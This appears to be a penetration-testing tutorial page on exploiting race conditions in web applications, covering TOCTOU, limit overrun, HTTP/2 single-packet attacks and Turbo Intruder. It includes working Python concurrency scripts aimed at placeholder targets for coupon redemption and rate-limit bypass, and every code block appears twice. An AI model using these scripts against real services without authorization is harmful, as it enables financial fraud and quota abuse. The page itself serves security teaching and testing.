Race Condition Exploitation
Race conditions occur when application behavior depends on the timing of events, allowing attackers to exploit the gap between checking a condition and using the result. These vulnerabilities can bypass security controls, duplicate transactions, or exceed rate limits.
Warning
๐ Quick Navigation
๐ฏ Fundamentals
โก Attack Techniques
- โข Limit Overrun Attacks
- โข Single-Packet Attacks
- โข Turbo Intruder
๐ค Automation
๐งช Practice
- โข Practice Labs
- โข Testing Checklist
Understanding Race Conditions
A race condition exists when the correct behavior of a system depends on the sequence or timing of uncontrollable events. In web applications, this typically occurs when:
- Multiple requests modify shared state without proper locking
- A check and subsequent action aren't atomic operations
- Database transactions lack appropriate isolation levels
- Caching layers introduce timing inconsistencies
Common Race Condition Scenarios
๐ฐ Financial Operations
Transfer funds, redeem coupons, claim rewards multiple times by sending concurrent requests
๐ซ Inventory/Quota
Book the same seat, purchase limited items, or exceed API rate limits
๐ Authentication
Bypass brute-force protections, reuse one-time tokens, or exploit session state
๐ File Operations
Exploit file write/read sequences, symlink attacks, or temp file vulnerabilities
Time-of-Check to Time-of-Use (TOCTOU)
TOCTOU is a specific race condition where a resource is checked for a condition, then used based on that check, but the resource's state changes between the check and use.
# TOCTOU Example: Coupon Redemption
# Vulnerable pseudo-code
def redeem_coupon(user_id, coupon_code):
# CHECK: Is coupon still valid?
coupon = db.query("SELECT * FROM coupons WHERE code = ?", coupon_code)
if coupon.used:
return "Coupon already used"
if coupon.expired:
return "Coupon expired"
# RACE WINDOW: Another request could redeem between check and use
# USE: Apply discount and mark as used
apply_discount(user_id, coupon.value)
db.execute("UPDATE coupons SET used = 1 WHERE code = ?", coupon_code)
return "Coupon redeemed successfully"
# Attack: Send 10 concurrent requests with same coupon
# Result: Multiple requests pass the check before any marks it used# TOCTOU Example: Coupon Redemption
# Vulnerable pseudo-code
def redeem_coupon(user_id, coupon_code):
# CHECK: Is coupon still valid?
coupon = db.query("SELECT * FROM coupons WHERE code = ?", coupon_code)
if coupon.used:
return "Coupon already used"
if coupon.expired:
return "Coupon expired"
# RACE WINDOW: Another request could redeem between check and use
# USE: Apply discount and mark as used
apply_discount(user_id, coupon.value)
db.execute("UPDATE coupons SET used = 1 WHERE code = ?", coupon_code)
return "Coupon redeemed successfully"
# Attack: Send 10 concurrent requests with same coupon
# Result: Multiple requests pass the check before any marks it usedInformation
Detection Techniques
Look for these indicators when hunting for race conditions:
# Indicators of potential race conditions:
1. State-changing operations without transactions:
- /api/transfer - Money transfers
- /api/redeem - Coupon/gift card redemption
- /api/vote - Voting systems
- /api/like - Social media interactions
2. Rate-limited endpoints:
- /api/generate - AI/content generation
- /api/export - Data exports
- /api/search - Search APIs
3. One-time-use tokens:
- /reset-password?token=xxx
- /verify-email?code=xxx
- /invite/accept?token=xxx
4. Inventory operations:
- /api/cart/checkout
- /api/booking/reserve
- /api/tickets/purchase
# Testing approach:
1. Identify state-changing endpoint
2. Capture the request in Burp
3. Send 10-50 concurrent requests using Turbo Intruder
4. Check if multiple succeeded when only one should have# Indicators of potential race conditions:
1. State-changing operations without transactions:
- /api/transfer - Money transfers
- /api/redeem - Coupon/gift card redemption
- /api/vote - Voting systems
- /api/like - Social media interactions
2. Rate-limited endpoints:
- /api/generate - AI/content generation
- /api/export - Data exports
- /api/search - Search APIs
3. One-time-use tokens:
- /reset-password?token=xxx
- /verify-email?code=xxx
- /invite/accept?token=xxx
4. Inventory operations:
- /api/cart/checkout
- /api/booking/reserve
- /api/tickets/purchase
# Testing approach:
1. Identify state-changing endpoint
2. Capture the request in Burp
3. Send 10-50 concurrent requests using Turbo Intruder
4. Check if multiple succeeded when only one should haveLimit Overrun Attacks
Limit overrun exploits the gap between checking a limit and updating the counter. If requests arrive simultaneously, multiple may pass the check before the limit is decremented.
# Limit Overrun Race Condition
# Exploit insufficient locking on rate limits or quotas
# Scenario: API allows 5 free requests per day
# Attack: Send 10+ requests simultaneously before limit is checked/updated
import threading
import requests
results = []
lock = threading.Lock()
def make_request(i):
r = requests.post("http://target.com/api/generate",
json={"prompt": "test"})
with lock:
results.append((i, r.status_code, r.json().get('remaining', 'N/A')))
print(f"Request {i}: {r.status_code} - Remaining: {r.json().get('remaining', 'N/A')}")
# Launch 10 threads simultaneously
threads = []
for i in range(10):
t = threading.Thread(target=make_request, args=(i,))
threads.append(t)
# Start all threads at once
for t in threads:
t.start()
# Wait for completion
for t in threads:
t.join()
# Check results - if more than 5 succeeded, race condition exists
successes = len([r for r in results if r[1] == 200])
print(f"\n[*] {successes} requests succeeded (limit was 5)")# Limit Overrun Race Condition
# Exploit insufficient locking on rate limits or quotas
# Scenario: API allows 5 free requests per day
# Attack: Send 10+ requests simultaneously before limit is checked/updated
import threading
import requests
results = []
lock = threading.Lock()
def make_request(i):
r = requests.post("http://target.com/api/generate",
json={"prompt": "test"})
with lock:
results.append((i, r.status_code, r.json().get('remaining', 'N/A')))
print(f"Request {i}: {r.status_code} - Remaining: {r.json().get('remaining', 'N/A')}")
# Launch 10 threads simultaneously
threads = []
for i in range(10):
t = threading.Thread(target=make_request, args=(i,))
threads.append(t)
# Start all threads at once
for t in threads:
t.start()
# Wait for completion
for t in threads:
t.join()
# Check results - if more than 5 succeeded, race condition exists
successes = len([r for r in results if r[1] == 200])
print(f"\n[*] {successes} requests succeeded (limit was 5)")Single-Packet Attacks (HTTP/2)
HTTP/2 multiplexing allows multiple requests over a single connection. By carefully crafting packets, all requests can arrive at the server in a single TCP packet, achieving true simultaneous processing.
# Single-packet attack using HTTP/2
# All requests arrive simultaneously on the wire
import h2.connection
import h2.events
import socket
import ssl
def single_packet_attack(host, requests):
"""
Send multiple HTTP/2 requests in a single TCP packet
This achieves true simultaneous arrival at the server
"""
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(['h2'])
sock = socket.create_connection((host, 443))
sock = ctx.wrap_socket(sock, server_hostname=host)
conn = h2.connection.H2Connection()
conn.initiate_connection()
sock.sendall(conn.data_to_send())
# Queue all requests without sending
stream_ids = []
for req in requests:
stream_id = conn.get_next_available_stream_id()
stream_ids.append(stream_id)
headers = [
(':method', 'POST'),
(':path', req['path']),
(':authority', host),
(':scheme', 'https'),
('content-type', 'application/json'),
]
conn.send_headers(stream_id, headers)
conn.send_data(stream_id, req['body'].encode(), end_stream=True)
# Send all requests in single packet
sock.sendall(conn.data_to_send())
# Collect responses
responses = {}
while len(responses) < len(requests):
data = sock.recv(65535)
events = conn.receive_data(data)
for event in events:
if isinstance(event, h2.events.DataReceived):
responses[event.stream_id] = event.data
return responses# Single-packet attack using HTTP/2
# All requests arrive simultaneously on the wire
import h2.connection
import h2.events
import socket
import ssl
def single_packet_attack(host, requests):
"""
Send multiple HTTP/2 requests in a single TCP packet
This achieves true simultaneous arrival at the server
"""
ctx = ssl.create_default_context()
ctx.set_alpn_protocols(['h2'])
sock = socket.create_connection((host, 443))
sock = ctx.wrap_socket(sock, server_hostname=host)
conn = h2.connection.H2Connection()
conn.initiate_connection()
sock.sendall(conn.data_to_send())
# Queue all requests without sending
stream_ids = []
for req in requests:
stream_id = conn.get_next_available_stream_id()
stream_ids.append(stream_id)
headers = [
(':method', 'POST'),
(':path', req['path']),
(':authority', host),
(':scheme', 'https'),
('content-type', 'application/json'),
]
conn.send_headers(stream_id, headers)
conn.send_data(stream_id, req['body'].encode(), end_stream=True)
# Send all requests in single packet
sock.sendall(conn.data_to_send())
# Collect responses
responses = {}
while len(responses) < len(requests):
data = sock.recv(65535)
events = conn.receive_data(data)
for event in events:
if isinstance(event, h2.events.DataReceived):
responses[event.stream_id] = event.data
return responsesTip
Turbo Intruder
Turbo Intruder is a Burp Suite extension designed for high-speed, precisely-timed attacks. It's the go-to tool for race condition testing.
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False)
# Send requests in parallel to trigger race condition
for i in range(30):
engine.queue(target.req, target.baseInput)
def handleResponse(req, interesting):
if interesting:
table.add(req)def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False)
# Send requests in parallel to trigger race condition
for i in range(30):
engine.queue(target.req, target.baseInput)
def handleResponse(req, interesting):
if interesting:
table.add(req)Turbo Intruder Tips
- Pipeline mode: Set
pipeline=Truefor HTTP/1.1 pipelining (faster than concurrent connections) - Connection pooling: Adjust
concurrentConnectionsbased on server capacity - Request timing: Use
engine.gatefor synchronized release - Last-byte sync: Use
race.pytemplate for last-byte synchronization
Python Exploitation Scripts
#!/usr/bin/env python3
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys
TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}
async def send_request(session, request_id):
"""Send a single request"""
headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
try:
async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
status = resp.status
body = await resp.text()
if "success" in body.lower() or status == 200:
print(f"[+] Request {request_id}: SUCCESS - {status}")
return True
else:
print(f"[-] Request {request_id}: Failed - {status}")
return False
except Exception as e:
print(f"[!] Request {request_id}: Error - {e}")
return False
async def race_attack(num_requests=20):
"""Launch concurrent requests"""
print(f"[*] Launching {num_requests} concurrent requests...")
connector = aiohttp.TCPConnector(limit=0, force_close=True)
async with aiohttp.ClientSession(connector=connector) as session:
# Create all tasks
tasks = [send_request(session, i) for i in range(num_requests)]
# Execute all at once
results = await asyncio.gather(*tasks)
successes = sum(results)
print(f"\n[*] Results: {successes}/{num_requests} successful")
if __name__ == "__main__":
num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
asyncio.run(race_attack(num))#!/usr/bin/env python3
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys
TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}
async def send_request(session, request_id):
"""Send a single request"""
headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
try:
async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
status = resp.status
body = await resp.text()
if "success" in body.lower() or status == 200:
print(f"[+] Request {request_id}: SUCCESS - {status}")
return True
else:
print(f"[-] Request {request_id}: Failed - {status}")
return False
except Exception as e:
print(f"[!] Request {request_id}: Error - {e}")
return False
async def race_attack(num_requests=20):
"""Launch concurrent requests"""
print(f"[*] Launching {num_requests} concurrent requests...")
connector = aiohttp.TCPConnector(limit=0, force_close=True)
async with aiohttp.ClientSession(connector=connector) as session:
# Create all tasks
tasks = [send_request(session, i) for i in range(num_requests)]
# Execute all at once
results = await asyncio.gather(*tasks)
successes = sum(results)
print(f"\n[*] Results: {successes}/{num_requests} successful")
if __name__ == "__main__":
num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
asyncio.run(race_attack(num))Async Attack Patterns
# Alternative approaches for race condition attacks
# 1. Threading with barrier synchronization
import threading
barrier = threading.Barrier(10) # Wait for 10 threads
def synchronized_request(i):
# All threads wait here until 10 are ready
barrier.wait()
# Then all fire simultaneously
requests.post(TARGET, json=PAYLOAD)
# 2. Multiprocessing for CPU-bound scenarios
from multiprocessing import Pool
def attack_request(i):
return requests.post(TARGET, json=PAYLOAD)
with Pool(20) as p:
results = p.map(attack_request, range(20))
# 3. Using grequests for gevent-based concurrency
import grequests
reqs = [grequests.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = grequests.map(reqs) # All sent ~simultaneously
# 4. httpx for HTTP/2 support
import httpx
async def h2_race():
async with httpx.AsyncClient(http2=True) as client:
tasks = [client.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = await asyncio.gather(*tasks)# Alternative approaches for race condition attacks
# 1. Threading with barrier synchronization
import threading
barrier = threading.Barrier(10) # Wait for 10 threads
def synchronized_request(i):
# All threads wait here until 10 are ready
barrier.wait()
# Then all fire simultaneously
requests.post(TARGET, json=PAYLOAD)
# 2. Multiprocessing for CPU-bound scenarios
from multiprocessing import Pool
def attack_request(i):
return requests.post(TARGET, json=PAYLOAD)
with Pool(20) as p:
results = p.map(attack_request, range(20))
# 3. Using grequests for gevent-based concurrency
import grequests
reqs = [grequests.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = grequests.map(reqs) # All sent ~simultaneously
# 4. httpx for HTTP/2 support
import httpx
async def h2_race():
async with httpx.AsyncClient(http2=True) as client:
tasks = [client.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = await asyncio.gather(*tasks)Practice Labs
PortSwigger Race Conditions
Comprehensive labs covering all race condition types
Turbo Intruder Examples
Official scripts including race condition templates
PentesterLab Race Condition
Hands-on exercise for exploiting race conditions
HackerOne Hacktivity
Real-world race condition reports for learning
Testing Checklist
๐ Identify Targets
- โ Money transfer endpoints
- โ Coupon/promo code redemption
- โ Rate-limited APIs
- โ One-time token endpoints
- โ Inventory/booking systems
- โ Vote/like functionality
โก Test Approach
- โ Use Turbo Intruder with race.py
- โ Try HTTP/2 single-packet attacks
- โ Test with 10, 20, 50 concurrent requests
- โ Check response differences
- โ Verify state changes in database
- โ Test during various server loads
๐ Verify Impact
- โ Did multiple requests succeed?
- โ Was the limit exceeded?
- โ Can you quantify financial impact?
- โ Is the race reproducible?
๐ Document
- โ Number of concurrent requests needed
- โ Success rate of exploitation
- โ Business impact (financial, data)
- โ Recommended mitigations